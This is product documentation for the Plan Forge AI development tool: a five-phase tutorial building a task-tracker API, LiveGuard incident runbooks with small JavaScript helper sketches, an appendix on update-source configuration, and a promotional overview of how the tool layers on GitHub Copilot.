4	Comments + event publishing	Ch 13 (quorum mode, parallel slices, model routing)
5	Dashboard views + caching	Ch 8 (custom instructions for reporting domain)

Phase 1 — Bootstrap + Health Endpoint

This is the same exercise from Chapter 6, but now in context of a larger project. Paste this into the specifier agent:

Paste into Step 0 (Specifier)

Feature: health-endpoint

Problem: The Tracker app needs a health check endpoint so load balancers
and monitoring tools can verify the service is running.

Scenarios: GET /health every 30 seconds. Returns 200 OK with
{"status": "healthy", "version": "1.0.0"}.

Acceptance Criteria:
- GET /health returns 200 with JSON body
- Response time under 50ms
- No authentication required
- If database unreachable: 503 {"status": "degraded", "reason": "database"}

Out of Scope: Deep dependency checks, metrics endpoint, custom health UI.

Run the full pipeline: Step 0 → Step 1 → Step 2 → Step 3 → Step 4 → Step 5 → Step 6. When done, run pforge phase-status docs/plans/Phase-1-*.md complete.

Phase 2 — Users + Authentication

Paste into Step 0 (Specifier)

Feature: user-authentication

Problem: The Tracker app needs user accounts with login, registration,
and role-based access control (admin, member).

MUST Criteria:
- User registration with email + password (hashed, never plaintext)
- Login returns JWT token (access + refresh)
- Role-based authorization: admin can manage all projects, member sees own
- Protected endpoints return 401 without valid token, 403 without required role
- Password reset flow (token-based)

SHOULD Criteria:
- Rate limiting on login endpoint (5 attempts per minute)
- Audit log for authentication events

Out of Scope: OAuth/social login, MFA, user profile editing.

Watch for auto-loading: When the executor creates auth files, notice that auth.instructions.md and security.instructions.md load automatically. This is the applyTo mechanism from Chapter 2 in action.

Phase 3 — Projects + Tasks CRUD

Paste into Step 0 (Specifier)

Feature: project-task-management

Problem: Users need to create projects and manage tasks within them.

MUST Criteria:
- CRUD for Projects (create, read, update, delete)
- CRUD for Tasks within a project
- Task fields: title, description, status (todo/in-progress/done), priority (low/medium/high), assignee, due date
- Only project owner or admin can delete a project
- List tasks with filtering by status, assignee, priority
- Pagination on list endpoints (default 20 per page)
- 90%+ test coverage on service layer

SHOULD Criteria:
- Task sorting by priority, due date, created date
- Bulk status update for selected tasks

Out of Scope: File attachments, subtasks, task templates, Kanban board UI.

Try the dashboard: Start the MCP server (node pforge-mcp/server.mjs) and watch localhost:3100/dashboard during execution. You'll see slices progress in real time. This is Chapter 7 in action.

Phase 4 — Comments + Event Publishing

Paste into Step 0 (Specifier)

Feature: comments-and-events

Problem: Users need to discuss tasks via comments, and the system needs
an event bus for audit/notification purposes.

MUST Criteria:
- Add, edit, delete comments on tasks
- Only comment author or admin can edit/delete
- Event publishing: task-created, task-updated, task-status-changed, comment-added
- Event consumers: update task activity log, update project last-modified timestamp
- Comments include created_at, updated_at timestamps

SHOULD Criteria:
- @mention support in comments (notify mentioned user)
- Activity feed endpoint: recent events across user's projects

Out of Scope: Real-time WebSocket push to clients, email notifications, rich text.

Try advanced execution: This phase has independent slices (comments vs events). Add [P] tags to the hardened plan for parallel execution. Try --quorum=auto to see multi-model consensus on complex slices. See Chapter 14.

Phase 5 — Dashboard + Reports

Paste into Step 0 (Specifier)

Feature: dashboard-and-reporting

Problem: Users need an overview of their projects with status summaries,
task distribution, and activity trends.

MUST Criteria:
- Dashboard endpoint: project count, task count by status, overdue tasks
- Per-project summary: task breakdown, recent activity, completion percentage
- Reporting endpoint: tasks completed this week/month, average time to close
- Cache dashboard data (invalidate on task/project changes)

SHOULD Criteria:
- Configurable date ranges on reports
- Export report as JSON

Out of Scope: Charts/graphs (API only), PDF export, scheduled reports.

Write a custom instruction: Create .github/instructions/reporting.instructions.md with rules for your reporting domain (cache invalidation patterns, aggregation query patterns). This is Chapter 9 in action.

Stretch Goals

Finished all 5 phases? Try these advanced exercises:

Exercise	What You'll Learn	Command/Chapter
Add multi-tenancy	Install an extension, see guardrails auto-apply	`pforge ext add saas-multi-tenancy` → Ch 11
Add CI validation	Automate quality gates on PRs	Copy `plan-forge-validate.yml` → Ch 13
Quorum analysis	Multi-model consistency scoring	`pforge analyze --quorum docs/plans/Phase-3-*.md`
Generate a Project Profile	Tighten guardrails based on your standards	Attach `project-profile.prompt.md` → Ch 8
Define Project Principles	Declare non-negotiable commitments	Attach `project-principles.prompt.md` → Ch 8
Run with a different AI tool	Test multi-agent setup	`.\setup.ps1 -Agent claude` → Ch 12
Diagnose a bug	Multi-model bug investigation	`pforge diagnose src/services/TaskService.*` → Ch 7

The specs are deliberately high-level. You use Plan Forge (specifier → hardener → executor) to flesh them out. That's the exercise: learning the pipeline by making it do the heavy lifting.

📄 Based on the Tracker sample app in plan-forge-testbed. See also: greenfield-todo-api walkthrough on GitHub

Appendix F

LiveGuard Alert Runbooks

The guardian fired. Here's exactly what to do next.

Runbooks for all 6 alert types. Severity matrix, per-alert response procedures, escalation paths, and the fix-proposal workflow. Auto-chaining and composite health checks are available.

Severity Matrix

Every LiveGuard alert carries one of four severity levels. The matrix below defines response SLA and escalation path. Full runbooks per alert type follow.

Severity	Response SLA	Notify	Dashboard Badge
Critical	Immediate, within 1 hour	On-call + team lead	Red badge on Triage tab
High	Same business day	On-call engineer	Amber badge on Triage tab
Medium	Next sprint	Team chat	Yellow dot on relevant tab
Low	Backlog	—	No badge

Per-Alert Runbooks

Drift Spike — Architecture Diverged from Plan Baseline

Source: forge_drift_report | Typical severity: Medium–High

Assess: Run pforge drift to get the current score and delta. If delta > 10 points in one session, treat as High.
Identify: Check the violations[] in the output; each violation lists the file, the rule, and the instruction file it violates.
Root cause: Was this an intentional architectural change? If yes, update the instruction file or plan baseline. If no, the code drifted from the plan.
Fix: For unintentional drift, refactor to match the plan. For intentional changes, update the plan's Scope Contract to reflect the new architecture.
Verify: Re-run pforge drift; the score should recover to within 5 points of the previous baseline.
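
The two thresholds in this runbook (a drop of more than 10 points means High; recovery means within 5 points of baseline) can be captured in a small helper. This is a sketch only: `assessDrift` is a hypothetical name, and treating every smaller drop as Medium is an assumption based on the "Medium–High" range above. The severity only matters once an alert has actually fired.

```javascript
// Hypothetical helper: compares the current drift score to the previous
// baseline. Lower scores mean more violations, so a positive delta is a drop.
function assessDrift(previousScore, currentScore) {
  const delta = previousScore - currentScore;
  return {
    delta,
    // Runbook rule: a drop of more than 10 points is treated as High.
    severity: delta > 10 ? "High" : "Medium",
    // Verify step: the score is back within 5 points of the baseline.
    recovered: Math.abs(delta) <= 5,
  };
}
```

For instance, a baseline of 90 and a current score of 75 gives a 15-point drop (High, not recovered), while 87 gives a 3-point drop that counts as recovered.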

Secret Found — High-Entropy String in Committed Diff

Source: forge_secret_scan | Typical severity: Critical

Do not push: If the commit hasn't been pushed, rewrite it to remove the secret: run git reset HEAD~1, remove the credential, and re-commit.
Rotate immediately: If the commit has been pushed, the credential is compromised. Rotate it in the external provider (API dashboard, vault, etc.) before any other action.
Remove from history: Use git filter-repo or BFG Repo-Cleaner to purge the secret from git history. A simple amendment is not sufficient because the old commit object still exists.
Move to secrets manager: Store the new credential in .forge/secrets.json (gitignored), an environment variable, or your cloud vault. Never in source code.
Verify: Re-run pforge secret-scan; the output should show clean: true.

Time-critical: Treat secret findings as Critical regardless of the entropy score. Automated rotation is out of scope for LiveGuard: the tool detects and alerts; humans rotate.
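
For readers unfamiliar with entropy scoring, the general technique is Shannon entropy over the characters of a candidate string: random-looking credentials score high, ordinary words score low. The sketch below shows that calculation only. How `forge_secret_scan` tokenizes diffs and which threshold it applies are not covered here, and `shannonEntropy` is a hypothetical name.

```javascript
// Shannon entropy in bits per character for a string.
function shannonEntropy(text) {
  const chars = [...text]; // iterate by code point, not UTF-16 unit
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let entropy = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}
```

A string of one repeated character scores 0 bits, and a string of four distinct characters scores 2 bits. Long base64 or hex credentials score considerably higher than identifiers or prose of the same length.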

Env Diff Gap — Required Key Missing from Environment File

Source: forge_env_diff | Typical severity: Medium–High

Review gaps: Run pforge env-diff to see which keys are missing and in which files.
Categorize: Is the key required for the target environment? Some keys (e.g., DEBUG=true) are intentionally absent from production.
Add missing keys: For required keys, add them to the target .env.* file with the appropriate value for that environment.
Document exceptions: If a key is intentionally absent, add a comment in the baseline .env file: # NOT_IN_PROD: DEBUG.
Verify: Re-run pforge env-diff; the output should show clean: true or only expected gaps.
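
The gap check itself is a set difference between the keys in a baseline file and the keys in a target file. The sketch below illustrates that idea and, as an assumption, treats `# NOT_IN_PROD: KEY` comments as machine-readable exceptions. Whether `pforge env-diff` parses that comment is not stated here, and all function names are hypothetical.

```javascript
// Extracts KEY names from dotenv-style text, ignoring comments and blanks.
function envKeys(text) {
  const keys = new Set();
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (line === "" || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq > 0) keys.add(line.slice(0, eq).trim());
  }
  return keys;
}

// Keys documented as intentionally absent via "# NOT_IN_PROD: KEY" comments.
function documentedExceptions(baselineText) {
  const found = new Set();
  for (const m of baselineText.matchAll(/^\s*#\s*NOT_IN_PROD:\s*(\w+)/gm)) {
    found.add(m[1]);
  }
  return found;
}

// Baseline keys that the target lacks and that are not documented exceptions.
function missingKeys(baselineText, targetText) {
  const target = envKeys(targetText);
  const allowed = documentedExceptions(baselineText);
  return [...envKeys(baselineText)].filter(
    (key) => !target.has(key) && !allowed.has(key)
  );
}
```

With a baseline that defines `DEBUG`, `DATABASE_URL`, and `API_KEY` and documents `DEBUG` as an exception, a target that only defines `DATABASE_URL` reports `API_KEY` as the single real gap.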

Regression Gate Failure — Previously Passing Gate Now Fails

Source: forge_regression_guard | Typical severity: High

Identify: Run pforge regression-guard to see which gates failed and their error output.
Bisect: Use git log to find which commit broke the gate. The gate command output usually points at the exact file.
Fix or update: If the code broke a valid gate, fix the code. If the gate is outdated (the feature was intentionally changed), update the gate command in the plan file.
Verify: Re-run pforge regression-guard --plan <affected-plan>; all gates should pass.

Dependency Vulnerability — New CVE in a Watched Package

Source: forge_dep_watch | Typical severity: Medium–Critical (depends on CVE severity)

Assess: Run pforge dep-watch to see new vulnerabilities with their CVE IDs and severity.
Check exploitability: Not all CVEs are exploitable in your context. Check if the vulnerable code path is reachable in your app.
Update: npm update <package> or pin to a patched version. For transitive dependencies, use npm audit fix.
If no patch exists: Evaluate alternatives, add a compensating control, or document the accepted risk with a timeline for re-evaluation.
Verify: Re-run pforge dep-watch; the vulnerability should move from newVulnerabilities to resolvedVulnerabilities.

Incident MTTR Exceeded — Time-to-Resolve Beyond Threshold

Source: forge_alert_triage (via MTTR calculation) | Typical severity: High

Review: Run pforge triage to see ranked open incidents and drift violations with their MTTR.
Escalate: If the incident has been open beyond the SLA for its severity level (see severity matrix above), escalate to the next tier defined in onCall.escalation.
Root cause: Is the incident blocked on external factors? If so, document the blocker in the incident description.
Close: Once resolved, update the incident status. MTTR is automatically calculated from capture time to close time.
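
The MTTR arithmetic behind this runbook is simple enough to sketch. The `resolvedAt` field comes from the glossary; `capturedAt`, both function names, and the caller-supplied threshold are assumptions for illustration, since the exact SLA-to-hours mapping is not defined here.

```javascript
const MS_PER_HOUR = 60 * 60 * 1000;

// Assumed incident shape: { capturedAt, resolvedAt } as ISO-8601 strings.
// Returns mean hours from capture to resolution, or null if none resolved.
function meanTimeToResolveHours(incidents) {
  const durations = incidents
    .filter((incident) => incident.resolvedAt)
    .map(
      (incident) =>
        (Date.parse(incident.resolvedAt) - Date.parse(incident.capturedAt)) /
        MS_PER_HOUR
    );
  if (durations.length === 0) return null;
  return durations.reduce((a, b) => a + b, 0) / durations.length;
}

// True when an unresolved incident has been open longer than the threshold.
function openBeyond(incident, now, thresholdHours) {
  if (incident.resolvedAt) return false;
  const openHours = (now.getTime() - Date.parse(incident.capturedAt)) / MS_PER_HOUR;
  return openHours > thresholdHours;
}
```

Two incidents resolved in 2 and 4 hours give an MTTR of 3 hours, and unresolved incidents are excluded from the mean until they close.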

Fix Proposal Workflow

When a LiveGuard tool fires a failure (regression, drift, incident, or secret found), forge_fix_proposal generates a scoped 1-2 slice fix plan for human review. This is the detect → propose → approve → fix loop.

Trigger: Run pforge fix-proposal --source regression (or drift/incident/secret) after the alert fires.
Review the plan: Open docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan contains the failing command, affected files, and a template fix slice with TODO markers for you to fill in.
Fill in the fix: Complete the TODO markers in the fix slice. For secret findings, the template directs you to remove the credential from the diff and rotate it externally before proceeding.
Execute on a branch: pforge run-plan --assisted docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan targets a dedicated branch, never master.
Verify: The second slice re-runs the exact commands that originally failed. Green gate = fix confirmed.
Promote or close: Merge the branch if the fix holds. Close the proposal by updating its status in .forge/fix-proposals.json. Auto-generated plans in docs/plans/auto/ are gitignored; promote a plan manually to docs/plans/ if you want to keep it in version history.

Loop cap: forge_fix_proposal generates at most one proposal per incidentId. If the first proposal doesn't resolve the issue, address it manually; the tool will return status: "needs-human-intervention" on the second call.
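
The loop cap behaves like a once-per-key guard. The sketch below models it with an in-memory set. The class name `FixProposalTracker` and the first-call status `"proposed"` are hypothetical; only the `"needs-human-intervention"` status and the plan path pattern come from the text above.

```javascript
// In-memory stand-in for whatever store tracks proposals per incident.
class FixProposalTracker {
  constructor() {
    this.seen = new Set();
  }

  // First call per incidentId yields a proposal; any repeat is refused.
  request(incidentId) {
    if (this.seen.has(incidentId)) {
      return { incidentId, status: "needs-human-intervention" };
    }
    this.seen.add(incidentId);
    return {
      incidentId,
      status: "proposed", // hypothetical status name for the first call
      planPath: `docs/plans/auto/LIVEGUARD-FIX-${incidentId}.md`,
    };
  }
}
```

Calling `request` twice with the same id returns a proposal the first time and the intervention status the second, while a different id starts fresh.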

Related: See Chapter 17 — LiveGuard Tools Reference for the exact CLI commands to run during each runbook step. See Chapter 18 to navigate to the alert from the dashboard.

Appendix G

Update Source Modes

Where pforge update pulls template bytes from, and why the default changed in v2.56.0.

The Problem

Before v2.56.0, pforge update had a single hard-coded source-selection rule: use the sibling clone at ../plan-forge if one existed, otherwise fail and ask for --from-github. This was optimized for contributors on their primary machine: the sibling is always on master, which is always freshly built, so contributors dogfood every change.

The trouble showed up on secondary machines: users who happened to have cloned the Plan Forge repo earlier (say, to browse the source) would later run pforge update on an unrelated project and get surprise -dev bytes from a stale master checkout. The second PC behaved differently from the first, for reasons that weren't obvious.

The Three Modes

.forge.json now accepts an updateSource key with three values. The default, auto, picks the right thing for most people; the other two give you explicit control.

Mode	Behavior	When to use
`auto` (default)	Picks the newer of your sibling clone and the latest GitHub tag. If the sibling is on a `-dev` build, GitHub wins.	Users on any machine. Teams. Anyone who isn't actively contributing patches back to Plan Forge.
`github-tags`	Always downloads the latest tagged release from GitHub. Ignores any sibling clone even if present.	Teams that want reproducible, audited updates. CI pipelines. Pinned-dependency shops.
`local-sibling`	Always uses the sibling clone at `../plan-forge`. Errors if one is missing.	Contributors working on Plan Forge itself. You run `git pull` in the sibling to pick up changes.

Auto mode in detail. It calls the GitHub Releases API (cached 24h in .forge/update-check.json) to resolve the latest tag, reads the sibling's VERSION file, and compares the two with semver precedence, except that any -dev pre-release loses to a clean tag. If the sibling wins or there's no network, it uses the sibling. If GitHub wins or there's no sibling, it uses the tag.
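
The decision described above can be sketched as a pure function over the two version strings. This is an illustration, not the code in `pforge update`: the function names, the optional `v` tag prefix, and resolving an exact tie in favor of GitHub are assumptions. Note that the "-dev always loses" rule is stricter than plain semver, where `2.57.0-dev` would outrank `2.56.0`.

```javascript
// Parses "2.56.0" or "v2.57.0-dev" into numeric parts plus a pre-release flag.
function parseVersion(text) {
  const match = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?$/.exec(text.trim());
  if (!match) throw new Error(`Unrecognized version: ${text}`);
  return {
    core: [Number(match[1]), Number(match[2]), Number(match[3])],
    preRelease: match[4] !== undefined,
  };
}

// Negative if a < b, positive if a > b, zero if equal in precedence.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a.core[i] !== b.core[i]) return a.core[i] - b.core[i];
  }
  // Same core version: a pre-release ranks below a clean release.
  return Number(b.preRelease) - Number(a.preRelease);
}

// Pass null for a side that is unavailable (no sibling clone, or no network).
function pickUpdateSource({ siblingVersion, githubTag }) {
  if (!siblingVersion && !githubTag) {
    throw new Error("No sibling clone and no GitHub tag available");
  }
  if (!githubTag) return "sibling"; // offline or lookup failed
  if (!siblingVersion) return "github"; // no sibling clone
  const sibling = parseVersion(siblingVersion);
  if (sibling.preRelease) return "github"; // a -dev build loses to a clean tag
  // Assumption: an exact tie goes to the GitHub tag.
  return compareVersions(sibling, parseVersion(githubTag)) > 0 ? "sibling" : "github";
}
```

A sibling on `2.57.0-dev` against tag `v2.56.0` resolves to GitHub, and a clean sibling on `2.57.0` against the same tag resolves to the sibling.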

How to Change Your Mode

There are three equivalent ways; they all write .forge.json.

1. CLI

Terminal

# Read current value
pforge config get update-source

# Set it
pforge config set update-source github-tags
pforge config set update-source local-sibling
pforge config set update-source auto

# List all settable keys
pforge config list

2. Dashboard

Open the dashboard (localhost:3100/dashboard), switch to the Config tab, and find the Update Source select. Your choice saves immediately; no Save button is required. The hint text below the dropdown reminds you what each mode does.

3. Hand-edit `.forge.json`

.forge.json

{
  "preset": "dotnet",
  "templateVersion": "2.56.0",
  "updateSource": "auto"
}

FAQ

Will `auto` ever install `-dev` bytes over my clean release?

No. The -dev refusal guard from v2.53.2 is still in place: if the selected source is a -dev build and your current install is clean, the update aborts with a helpful message. auto mode short-circuits this earlier by preferring the tagged release. If you explicitly set local-sibling and the sibling is -dev, you'll hit the refusal unless you pass --allow-dev.
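As a rough sketch of that guard, assuming versions are plain strings and that a `-dev` suffix is the only marker of a development build (`checkDevGuard` and its return shape are hypothetical, not the real API):

```javascript
// Hypothetical sketch of the -dev refusal guard; names and messages are illustrative.
function checkDevGuard({ currentVersion, sourceVersion, allowDev = false }) {
  const sourceIsDev = sourceVersion.includes("-dev");
  const currentIsClean = !currentVersion.includes("-dev");
  if (sourceIsDev && currentIsClean && !allowDev) {
    return {
      proceed: false,
      reason: `Refusing to install ${sourceVersion} over clean ${currentVersion}; pass --allow-dev to override.`,
    };
  }
  return { proceed: true, reason: null };
}

console.log(checkDevGuard({ currentVersion: "2.56.0", sourceVersion: "2.57.0-dev" }).proceed);
console.log(checkDevGuard({ currentVersion: "2.56.0", sourceVersion: "2.57.0-dev", allowDev: true }).proceed);
```

The first call prints `false` (the update aborts) and the second prints `true`, mirroring the effect of `--allow-dev`.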

What happens offline in `auto` mode?

If the GitHub tag lookup fails (timeout, no network, rate limit), auto falls back to the sibling if one exists. If there's no sibling and no network, you'll get the same error you would have gotten pre-v2.56.0: rerun with --from-github when you're back online, or set up a sibling clone.

`pforge self-update` — does this affect it?

No. self-update is a separate command that always pulls from GitHub releases (it's designed to heal a corrupted install). updateSource only controls pforge update.

Should CI pipelines set a mode?

Yes. Set updateSource to github-tags in your CI's .forge.json. This guarantees every CI run pulls from a tagged GitHub release and ignores whatever happens to be checked out in adjacent directories.

Do I need to migrate my existing `.forge.json`?

No. Projects with no updateSource key default to auto, which is the recommended behavior anyway. The change is additive.
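The additive default can be illustrated with a small reader for `.forge.json`. This is a sketch under stated assumptions: `resolveUpdateSource` is a hypothetical helper, and rejecting unknown values with an error is an assumption about how invalid input might be handled.

```javascript
// Hypothetical sketch: resolve the effective updateSource from .forge.json text.
const UPDATE_SOURCES = ["auto", "github-tags", "local-sibling"];

function resolveUpdateSource(forgeJsonText) {
  const config = JSON.parse(forgeJsonText);
  const value = config.updateSource ?? "auto"; // a missing key behaves like "auto"
  if (!UPDATE_SOURCES.includes(value)) {
    throw new Error(`Unknown updateSource "${value}"; expected one of ${UPDATE_SOURCES.join(", ")}`);
  }
  return value;
}

// A pre-v2.56.0 file without the key resolves to the default.
console.log(resolveUpdateSource('{"preset": "dotnet", "templateVersion": "2.55.0"}'));
```

The call prints `auto`, which is why existing projects need no migration.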

GitHub Stack Alignment

The thesis: GitHub ships the agent runtime + integration standards + customization primitives + engagement metrics. Everything above the runtime is the ecosystem's lane. Plan Forge is built for that lane.

Who this page is for: Engineering leaders, platform engineers, and architects evaluating a complete AI-SDLC stack, whether you've already standardized on GitHub Copilot or you're shopping the category fresh.

Companion to: What is Plan Forge? · How it works · Appendix I — Plan Forge on the GitHub Stack (the surface-by-surface technical reference).

Why this combination is the only one in the category

Plan Forge + GitHub Copilot ships four capabilities no other AI-SDLC platform on the market combines today:

Three-tier memory, so context quality compounds across teams instead of being a per-repo lottery
Multi-model quorum eval: Claude + GPT + Gemini score the same slice independently, with a 0–100 LLM-as-judge consensus
Audit Loop: a scan-triage-fix loop for AI-generated drift, off by default and hard-blocked in production at the schema level
Watcher: a second IDE session that tails any in-flight run, read-only by schema (it cannot write to the target)

In a hurry? Read the next three sections and stop: What you get · The picture · The four pillars. Then jump to Try it — on your own. Architects: the lower half of the page is the supporting context.

What you get — the outcomes

Six numbers every AI-SDLC programme is shopping for. Plan Forge surfaces all six on the live dashboard out of the box: no warehouse project, no BI build, no glue code.

Metric	What it measures
AI-PR %	Share of merged PRs touched by an agent
% code by AI	Bytes changed by agent vs human, per slice
Pass-rate / phase	First-pass success: design / code / review / test
RCA MTTR	Incident fired → fix validated, in hours
Drift score	Codebase vs architecture, scored per commit
$ / merged PR	Token spend reconciled against shipped value

The leading-indicator metric leadership usually asks for last, human-intervention frequency, is also captured automatically. Every instance of a human taking over from an agent is recorded, and trend lines show whether the harness is getting better or worse. See Health DNA for the full metric catalogue, or the quick reference for the complete dashboard surface.
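To make two of these definitions concrete, here is a minimal sketch of how AI-PR % and $ / merged PR could be derived from per-PR records. The record shape (`merged`, `touchedByAgent`, `tokenCostUsd`) and the function name are hypothetical, and counting spend on unmerged PRs against the merged total is an assumption about what "reconciled against shipped value" means; the dashboard's real calculation may differ.

```javascript
// Hypothetical sketch: derive two KPIs from a list of PR records.
function summarisePullRequests(pullRequests) {
  const merged = pullRequests.filter((pr) => pr.merged);
  if (merged.length === 0) return { aiPrPercent: 0, costPerMergedPr: 0 };
  const agentTouched = merged.filter((pr) => pr.touchedByAgent).length;
  // Assumption: all token spend counts, including spend on PRs that never merged.
  const totalSpend = pullRequests.reduce((sum, pr) => sum + pr.tokenCostUsd, 0);
  return {
    aiPrPercent: (agentTouched / merged.length) * 100,
    costPerMergedPr: totalSpend / merged.length,
  };
}

const samplePullRequests = [
  { merged: true, touchedByAgent: true, tokenCostUsd: 2 },
  { merged: true, touchedByAgent: false, tokenCostUsd: 0 },
  { merged: true, touchedByAgent: true, tokenCostUsd: 3 },
  { merged: false, touchedByAgent: true, tokenCostUsd: 1 },
];
console.log(summarisePullRequests(samplePullRequests));
```

With this made-up sample, two of the three merged PRs were touched by an agent, and 6 USD of total spend is spread over three merged PRs.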

The picture — harness (orchestration) on substrate (primitives)

Read top-down: outcomes you get, the harness (the orchestration layer Plan Forge provides), the substrate (GitHub Copilot's primitives) it sits on, and the GitHub platform foundation everything inherits.

AI SDLC Stack

End to end — harness on substrate

The first complete AI software-development lifecycle stack: GitHub Copilot below, Plan Forge above, your outcomes on top.

Read top-down: the green band is what you ship. The amber band is Plan Forge, the harness (orchestration) that produces those outcomes. The blue band is the GitHub Copilot substrate (primitives) the harness sits on. The slate band is the GitHub platform foundation everything inherits.

The four pillars — what the harness actually does

Plan Forge organises into four pillars. Each card is plain English; the What's inside entry under each card lists the component-level detail and the manual chapters that go deep.

1 · Orchestration

Plans become slices, slices become work, work becomes audited PRs.

An idea is interviewed into a hardened plan. The plan is split into safe-sized slices. Each slice runs in its own worktree, gets reviewed by 20 specialised reviewer agents, and only ships if its validation gate passes. The platform learns from every run and builds new skills automatically.

What's inside & where to read more

Crucible interview funnel · Tempering quality scorer · Inner Loop competitive worktrees · Forge-Master chat-first router · 20 read-only reviewer agents · 14 slash-command skills · Reflexion retry · auto-skill library · lifecycle hooks (pre/post slice).

→ Crucible · Inner Loop · Forge-Master · Instructions & Agents · Agent Factory recipe · Multi-agent

… and more. Full surface area in the quick reference.

2 · Memory

Context quality compounds across teams instead of being a per-repo lottery.

Three tiers: a live event stream you can watch right now, a deterministic file trail every team can audit and grep, and an optional semantic store that lets one team's lessons surface automatically when another team hits a similar problem. Lessons learned in service A become defaults in service B without anyone filing a knowledge-base article.

What's inside & where to read more

L1 Hub: live WebSocket events · L2 Files: .forge/ append-only audit trail · L3 OpenBrain: pgvector semantic store · cross-team federation (read-only) · bridge-and-flush durability · search_thoughts · brain_recall.

→ Memory architecture

3 · Eval & Drift

Quality, not just adoption: the half the GitHub Metrics API doesn't cover.

Three frontier models score the same change independently and a reviewer model produces a 0–100 consensus number. Drift from your architecture is measured per commit. RCA outputs become PR proposals, not tickets. Cost is previewed before the run, not after the bill.
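The shape of the quorum output can be illustrated with a simple stand-in. In Plan Forge the consensus number comes from a reviewer model; the sketch below swaps that for a plain median, purely to show independent 0–100 scores being reduced to one number plus a disagreement signal. `consensusScore` and the score keys are hypothetical.

```javascript
// Hypothetical stand-in: a median replaces the reviewer model's judgement.
function consensusScore(scoresByModel) {
  const values = Object.values(scoresByModel);
  if (values.length === 0) throw new Error("At least one score is required");
  for (const value of values) {
    if (!Number.isFinite(value) || value < 0 || value > 100) {
      throw new RangeError(`Score out of range 0-100: ${value}`);
    }
  }
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  const median = sorted.length % 2 === 1 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
  // Spread is a crude disagreement signal: the gap between highest and lowest score.
  return { consensus: median, spread: sorted[sorted.length - 1] - sorted[0] };
}

console.log(consensusScore({ claude: 82, gpt: 74, gemini: 90 }));
```

For the made-up scores above the result is a consensus of 82 with a spread of 16; a large spread would be a natural trigger for human review.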

What's inside & where to read more

Quorum (Claude + GPT + Gemini) · 0–100 LLM-as-judge consensus · forge_drift_report per-commit · forge_health_trend with trajectories · forge_estimate_quorum (cancellable cost preview) · forge_fix_proposal (RCA → PR) · % code by AI · MTTR · drift score.

→ Health DNA · Self-deterministic loop · Dashboard

4 · Governance & Self-Repair

Audit-grade by default. Approve from your phone. The platform reports its own bugs upstream.

Hooks fire before every deploy and after every slice. Bugs deduplicate themselves. A separate read-only watcher tails any in-flight run. When the harness itself misbehaves, it files a structured bug report against its own upstream, so you're never left holding the bag alone on a platform issue.

What's inside & where to read more

LiveGuard hooks (preDeploy / postSlice / preAgentHandoff) · Bug Registry with fingerprint dedupe · Incident Capture + MTTR · Audit Loop (scan → triage → spawn-worker fix) · forge_runbook + Deploy Journal · Remote Bridge (Slack / Teams / PagerDuty / Discord / Telegram) · Watcher (read-only by schema) · forge_meta_bug_file self-repair.

→ What is LiveGuard · LiveGuard dashboard · Audit loop · Bug registry · Watcher · Remote bridge

What we deliberately don't try to do

Discipline matters. A platform that tries to own everything ends up owning nothing well. Plan Forge does not:

Replicate the Copilot Metrics API: we add quality metrics; we don't re-implement adoption metrics
Embed or fork the Copilot Cloud Agent runtime: we dispatch to it
Compete with github/github-mcp-server: we use it, and ship our own MCP server only for orchestration concerns
Reinvent AGENTS.md, Skills, or MCP: we adopt the open standards and contribute back when we learn something

If GitHub ships a feature that subsumes a Plan Forge capability, the right answer is to delete the Plan Forge code and use GitHub's. We're explicit about that in the project README.

Try it — on your own, on your own time

Plan Forge is MIT-licensed and open source. There's no sales call, no pilot agreement, no license to procure. If you already have GitHub Copilot and GHAS, you have everything you need to evaluate the full stack against your own repos this afternoon.

Install in one repo. Clone github.com/srnichols/plan-forge, run setup.ps1 -Agent claude (or --agent codex / --agent cursor / --agent copilot). Generate Project Principles + initial instruction files via forge_run_skill /onboarding. Wire action.yml into GitHub Actions for PR-time gates. Walk-through: install + first plan.
Run a real task end-to-end. Take one in-flight ticket through the full pipeline: Crucible → plan → execution → reviewer agents → Bug Registry if you hit one. The trajectory is captured automatically; you can replay it from the dashboard.
Add a second repo, turn on what makes sense for you. Cloud Agent dispatch (--worker copilot-coding-agent) for async bulk work. LiveGuard hooks if you have a deploy pipeline. The Audit Loop if you want a Coverity-style scan over an existing module. Everything is opt-in.
Read the dashboard. The six KPIs from "What you get" populate themselves as you run plans. Compare to your baseline. Decide whether to roll wider on your own schedule.

Cost to evaluate: zero beyond your existing Copilot + GHAS subscription. No new licences, no headcount, no infrastructure, no procurement cycle. Bring your own GHCP partner relationship if you have one; Plan Forge composes on top of whatever Copilot Enterprise tier and support arrangement you already use.

Stuck? File an issue at github.com/srnichols/plan-forge/issues, or open a discussion. Plan Forge ships forge_meta_bug_file precisely so problems with the platform get reported back automatically; you're not on your own.

Architect appendix · supporting context for technical readers

The signal: GitHub said this out loud in April 2026

On April 2, 2026, GitHub shipped the Copilot SDK in public preview. The release notes describe it as "the same production-tested agent runtime that powers GitHub Copilot cloud agent and Copilot CLI" exposed for application developers to embed.

The implication is unmistakable:

GitHub views agent orchestration as something built on top of their primitives, not inside them.

This page documents how Plan Forge composes with the primitives GitHub explicitly leaves to the ecosystem.

What GitHub ships (the substrate — primitives)

Primitive	What it is	Status (May 2026)
Copilot Cloud Agent (formerly Coding Agent)	Ephemeral Actions-powered runner. Single repo / single branch / single PR per task. Three modes: research-only, plan-only, branch-only	GA
AGENTS.md	Open standard for agent context files	Stewarded by Agentic AI Foundation under the Linux Foundation. 60k+ repos use it. GitHub adopts; does not own
Agent Skills	Open standard for agent procedural knowledge	Repo `agentskills/agentskills`, Apache 2.0, maintained by Anthropic. GitHub adopts
Model Context Protocol (MCP)	Open standard for agent-to-tool integration	Linux Foundation project. Maintained by Anthropic et al. GitHub ships `github/github-mcp-server` (29.5k stars, MIT) as the reference implementation
`.github/instructions/`	GitHub-native repo customization	GA. Plan Forge ships ~18 instruction files
